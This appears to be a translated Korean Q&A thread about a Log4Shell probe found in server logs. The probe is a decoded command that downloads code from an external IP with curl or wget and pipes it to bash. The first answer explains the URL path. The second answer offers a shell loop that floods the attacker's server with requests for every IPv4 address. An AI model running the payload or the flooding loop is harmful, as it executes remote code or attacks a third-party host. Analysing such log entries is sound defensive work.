최근 log4j 문제가 발생한 후 서버 로그를 살펴보던 중 base64로 인코딩된 흥미로운 명령을 발견했습니다(디코딩된 버전은 아래에 있음).
(curl -s 195.54.160.149:5874/66.228.37.152:80||wget -q -O- 195.54.160.149:5874/66.228.37.152:80)|bash
/
서버 이름/IP에 a가 있는 호스트에 대한 컬 명령이 표시되지 않기 때문에 관심이 있습니다 . 무슨 뜻이에요? 이것이 소스 IP를 스푸핑하는 방법인지 궁금합니다. 이는 말이되지 않습니다. 어쩌면 서브넷 설정(나에게도 이해가 되지 않음)일까요?
답변1
이는 특별한 의미가 없습니다. 슬래시는 호스트와 포트를 경로에서 분리합니다.
curl 195.54.160.149:5874/66.228.37.152:80
/66.228.37.152:80
195.54.160.149의 포트 5874에 연결하고 식별된 리소스를 사용하도록 요청합니다.
GET /66.228.37.152:80 HTTP/1.1
66.228.37.152:80
웹 서버에서 호출되는 파일을 호스팅하여 이와 같은 것을 직접 설정할 수 있습니다. 서버가 경로로 수행하는 작업은 서버 소유자의 설정에 따라 다릅니다.
답변2
Log4Shell 취약점이 실제로 발견되고 있습니다. 위의 다른 사람들이 말했듯이 이는 악용 가능한 노드를 발견했음을 소스에 경고합니다. 당신이 구체적으로 연결한 노드는 내 로그에 표시된 것과 동일한 러시아 노드입니다. 나는 그들이 발견했을 수 있는 모든 것을 은폐하려는 시도로 동일한 서버에 응답하기 시작했습니다.
for firstoctet in {0..255}; do
for ip in ${firstoctet}.{0..255}.{0..255}.{0..255}; do
curl -s 195.54.160.149:5874/${ip}:80
done
done
https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html